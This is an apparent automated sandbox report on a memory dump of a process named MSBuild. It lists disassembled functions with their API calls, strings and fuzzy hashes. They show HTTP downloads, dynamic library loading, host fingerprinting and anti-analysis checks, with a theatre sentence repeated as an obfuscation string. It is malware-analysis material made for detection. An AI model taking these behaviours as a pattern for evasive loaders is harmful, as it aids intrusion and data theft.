lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045CC
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045D7
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045E2
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045ED
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045F8
GetProcessHeap.KERNEL32(00000000,?,?,0000000F,?,004169FB), ref: 00404607
RtlAllocateHeap.NTDLL(00000000,?,0000000F,?,004169FB), ref: 0040460E
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 0040461C
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404627
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404632
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 0040463D
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404648
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 0040465C
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404667
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404672
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 0040467D
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404688
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046B1
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046BC
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046C7
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046D2
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046DD
strlen.MSVCRT ref: 004046F0
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404718
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404723
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040472E
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404739
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404744
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404754
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040475F
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040476A
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404775
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404780
VirtualProtect.KERNELBASE(?,00000004,00000100,00000000), ref: 0040479C

Strings

The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040475A
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404638
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046CD
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040473F
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040477B
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404657
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040462D
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046B7
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045F3
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404678
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040474F
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045C7
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040466D
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404770
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045DD
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404683
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046C2
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040471E
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404729
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046D8
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404643
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404765
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045E8
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404662
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404617
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404734
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404622
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046AC
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045D2
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404713

Memory Dump Source

Source File: 00000001.00000002.1493810804.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: lstrlen$Heap$AllocateProcessProtectVirtualstrlen
String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
API String ID: 2127927946-2218711628
Opcode ID: 60c508d88f0449400eea4780d1c2a55aa70dbc5de1ae23165444dfbd3f1c6033
Instruction ID: ff82eb6acc97b20701c4bcbd3dbf8f3289274c2dbbe7f73b68b52ee208cac3fc
Opcode Fuzzy Hash: 60c508d88f0449400eea4780d1c2a55aa70dbc5de1ae23165444dfbd3f1c6033
Instruction Fuzzy Hash: 1D419979740624EBC718AFE5FC8DB987F71AB4C712BA0C062F90296190C7B9D5119B3E

Function 00406280 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 191
networkfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 004047EA
Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404801
Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404818
Part of subcall function 004047B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849

InternetOpenA.WININET(00420DFE,00000001,00000000,00000000,00000000,00420DFB), ref: 004062E1
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406335
HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004063D1
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0040646D

Strings

ERROR, xrefs: 004064C9
ERROR, xrefs: 00406407
GET, xrefs: 0040637C

Memory Dump Source

Source File: 00000001.00000002.1493810804.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: Internet$??2@$ConnectCrackFileHttpOpenReadRequestSend
String ID: ERROR$ERROR$GET
API String ID: 1522062773-2509457195
Opcode ID: 460f558118b4083d41359c156125f26ce9f22fb94ebe107836e013dd45d71b95
Instruction ID: 4c22ad93782da972e928cd377ef6cc95e5ae9f8df18decad01f21c65d1bf8a87
Opcode Fuzzy Hash: 460f558118b4083d41359c156125f26ce9f22fb94ebe107836e013dd45d71b95
Instruction Fuzzy Hash: C1718075A00218ABDB24EFE0DC49BEE7775FB44700F10816AF50A6B1D0DBB86A85CF56

Function 00417850 Relevance: 1.5, APIs: 1, Instructions: 36COMMON

Download Yara Rule

APIs

GetUserNameA.ADVAPI32(00000104,00000104), ref: 0041789F

Memory Dump Source

Source File: 00000001.00000002.1493810804.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: 98be1400a0f13b17dcfec3579e84c662f1c1c1bd9e35413721d24a5daf15813c
Instruction ID: ff9f3fb77af2488786a742b30a7a77c7a6675fe12b7944dcc27658a291e6e945
Opcode Fuzzy Hash: 98be1400a0f13b17dcfec3579e84c662f1c1c1bd9e35413721d24a5daf15813c
Instruction Fuzzy Hash: 08F04FB5D44208AFC710DFD8DD49BAEBBB8EB05711F10025AFA05A2680C77815448BA2

Function 00401160 Relevance: 1.5, APIs: 1, Instructions: 15COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNELBASE(?,?,?,?,?,?,?,?,?,00416A17,00420AEF), ref: 0040116A

Memory Dump Source

Source File: 00000001.00000002.1493810804.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: InfoSystem
String ID:
API String ID: 31276548-0
Opcode ID: 5e169adc815d3d5e963ffc5450d2c06f987a57c1971b55ed15331b47ed99491e
Instruction ID: a8b5f4e8781596c88644d8aa2969b9d6e82c50da38cf1cac8898b5ca04c80d98
Opcode Fuzzy Hash: 5e169adc815d3d5e963ffc5450d2c06f987a57c1971b55ed15331b47ed99491e
Instruction Fuzzy Hash: F4D05E7C94030CEBCB14EFE0D9496DDBB79FB0D311F001559ED0572340EA306481CAA6

Function 00419C10 Relevance: 18.2, APIs: 8, Strings: 2, Instructions: 684
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE(?,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A03D
LoadLibraryA.KERNELBASE(?,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A04E
LoadLibraryA.KERNELBASE(?,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A060
LoadLibraryA.KERNELBASE(?,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A072
LoadLibraryA.KERNELBASE(?,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A083
LoadLibraryA.KERNELBASE(?,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A095
LoadLibraryA.KERNELBASE(?,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A0A7
LoadLibraryA.KERNELBASE(?,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A0B8

Strings

InternetSetOptionA, xrefs: 0041A5E5
HttpQueryInfoA, xrefs: 0041A5FC

Memory Dump Source

Source File: 00000001.00000002.1493810804.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: HttpQueryInfoA$InternetSetOptionA
API String ID: 1029625771-1775429166
Opcode ID: 62050089a8b8835eafd1d37742ef1b979ae5b20786234f8d6d940be7715c0619
Instruction ID: b148544ec257a615b167952e2e9b89b3667e8f5620887ecf26b211dda149ff7d
Opcode Fuzzy Hash: 62050089a8b8835eafd1d37742ef1b979ae5b20786234f8d6d940be7715c0619
Instruction Fuzzy Hash: 02621DBD5C0200BFD364DFE8EE889A63BFBF74E701714A61AE609C3264D6399441DB52

Function 00404880 Relevance: 11.0, APIs: 1, Strings: 5, Instructions: 479
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 004047EA
Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404801
Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404818
Part of subcall function 004047B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849

InternetCloseHandle.WININET(00000000), ref: 00404EAD

Strings

------, xrefs: 004049BD
", xrefs: 00404BF2
", xrefs: 00404D33
------, xrefs: 00404C69
------, xrefs: 00404B28

Memory Dump Source

Source File: 00000001.00000002.1493810804.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: ??2@$Internet$CloseCrackHandle
String ID: "$"$------$------$------
API String ID: 3842476067-2180234286
Opcode ID: 8871a7e0db803886412357a9f8af80b172f418654194f3178fcef7dc839d38c6
Instruction ID: 3f466b8612cc2db17a5d9ea90efc92506b51061f54fe9a8e3d974c375c306076
Opcode Fuzzy Hash: 8871a7e0db803886412357a9f8af80b172f418654194f3178fcef7dc839d38c6
Instruction Fuzzy Hash: 10124EB1911118AADB14FB91DD92FEEB339AF14314F50419EB10672091DF382F9ACF6A

Function 004047B0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 60
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

??2@YAPAXI@Z.MSVCRT(00000800), ref: 004047EA
??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404801
??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404818
InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849

Strings

<, xrefs: 004047C9

Memory Dump Source

Source File: 00000001.00000002.1493810804.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: ??2@$CrackInternet
String ID: <
API String ID: 676793843-4251816714
Opcode ID: c386c9d0d73067ea41f4377aeaa2fd448281082c22fa9440fc98d6664c6993a8
Instruction ID: 59ffd934fb977a93d501bba2862ecb1df6a0defd032b503e5e890a78b3955a81
Opcode Fuzzy Hash: c386c9d0d73067ea41f4377aeaa2fd448281082c22fa9440fc98d6664c6993a8
Instruction Fuzzy Hash: 712149B5D00219ABDF10DFA5E849BDD7B74FF04320F008229F925A7290EB706A15CF95

Function 00419860 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 212
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE(?,?,00416A00), ref: 00419A9A
LoadLibraryA.KERNELBASE(?,?,00416A00), ref: 00419AAB
LoadLibraryA.KERNELBASE(?,?,00416A00), ref: 00419ACF

Strings

NtQueryInformationProcess, xrefs: 00419BAA

Memory Dump Source

Source File: 00000001.00000002.1493810804.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: NtQueryInformationProcess
API String ID: 1029625771-2781105232
Opcode ID: 5241b63200b37b02610696a8d235fc94b134fee8225fd0051d7d8784b632fee7
Instruction ID: 20ebc6b46c949eaa7f25e90fb8197bb2e58582eade08509f86bd82c1d7e4afd5
Opcode Fuzzy Hash: 5241b63200b37b02610696a8d235fc94b134fee8225fd0051d7d8784b632fee7
Instruction Fuzzy Hash: 55A14DBD5C4240BFE354EFE8ED889963BFBF74E301704661AE605C3264D639A841DB12

Function 004117A0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 160
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExitProcess.KERNEL32(00000000), ref: 004117D1
strtok_s.MSVCRT ref: 004117E8
strtok_s.MSVCRT ref: 004119A8

Strings

block, xrefs: 004117B7

Memory Dump Source

Source File: 00000001.00000002.1493810804.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: strtok_s$ExitProcess
String ID: block
API String ID: 762877946-2199623458
Opcode ID: 04f02f922f7740013fe83ed2a8f854d15328f230cbde421a22dc870209397cee
Instruction ID: 00bb13bb87ecd4f31d5cbb7361e66ee12f2c4d363b15aa8138e6c51e0cba8311
Opcode Fuzzy Hash: 04f02f922f7740013fe83ed2a8f854d15328f230cbde421a22dc870209397cee
Instruction Fuzzy Hash: AC517DB4A10209EFCB04DFA1D954BFE77B6BF44304F10804AE516A7361D778E992CB6A

Function 00417500 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 106
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVolumeInformationA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041757F

Strings

C, xrefs: 0041754C
:, xrefs: 0041755C
\, xrefs: 00417560

Memory Dump Source

Source File: 00000001.00000002.1493810804.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: InformationVolume
String ID: :$C$\
API String ID: 2039140958-3809124531
Opcode ID: ed3ca360dd794ca93df171aa1d69aa55e8069c6d35c7c4129d84d5da30dc5272
Instruction ID: 2fa5a76c25c4840d12821100fc964cf287d391274576238511e757cc0c078ff1
Opcode Fuzzy Hash: ed3ca360dd794ca93df171aa1d69aa55e8069c6d35c7c4129d84d5da30dc5272
Instruction Fuzzy Hash: BF41A2B5D44248ABDB10DF94DC45BEEBBB9EF08714F10019DF50967280D778AA84CBA9

Function 00401220 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 41
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GlobalMemoryStatusEx.KERNELBASE(00000040,?,00000000,00000040), ref: 0040123E
__aulldiv.LIBCMT ref: 00401258
__aulldiv.LIBCMT ref: 00401266

Strings

@, xrefs: 00401233

Memory Dump Source

Source File: 00000001.00000002.1493810804.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: __aulldiv$GlobalMemoryStatus
String ID: @
API String ID: 2185283323-2766056989
Opcode ID: e3d9931386e0fa91028f4e7641da7fda79c4023127bcc5196728e9d9e144d5c4
Instruction ID: f2ded3d157cb35307e0b39d430c96622be3dd75f8d5744ac0086d878f352425a
Opcode Fuzzy Hash: e3d9931386e0fa91028f4e7641da7fda79c4023127bcc5196728e9d9e144d5c4
Instruction Fuzzy Hash: 5901FBB0D84308BAEB10DBE4DC49B9EBB78AB15705F20809EE705B62D0D6785585879D

Function 004169F0 Relevance: 1.6, APIs: 1, Instructions: 94
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00401160: GetSystemInfo.KERNELBASE(?,?,?,?,?,?,?,?,?,00416A17,00420AEF), ref: 0040116A

Part of subcall function 00401110: VirtualAllocExNuma.KERNELBASE(00000000,?,?,00416A1C), ref: 00401132

Part of subcall function 00401220: GlobalMemoryStatusEx.KERNELBASE(00000040,?,00000000,00000040), ref: 0040123E
Part of subcall function 00401220: __aulldiv.LIBCMT ref: 00401258
Part of subcall function 00401220: __aulldiv.LIBCMT ref: 00401266

GetUserDefaultLCID.KERNELBASE ref: 00416A26

Part of subcall function 00417850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0041789F

Part of subcall function 004178E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0041792F

Memory Dump Source

Source File: 00000001.00000002.1493810804.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: NameUser__aulldiv$AllocComputerDefaultGlobalInfoMemoryNumaStatusSystemVirtual
String ID:
API String ID: 3178950686-0
Opcode ID: 89bd8792c9ea463fe5cd0678b04f38b1ba409c67d9b77676339e57910a337a73
Instruction ID: 00249ead6714b3af85de48d5768f0cff66b99727dd84f15ff7ce73ce32af2852
Opcode Fuzzy Hash: 89bd8792c9ea463fe5cd0678b04f38b1ba409c67d9b77676339e57910a337a73
Instruction Fuzzy Hash: 63316175940208AADB04FBF2DC56BEE7339AF04354F10452EF102A61D2DF7C6996C6AE

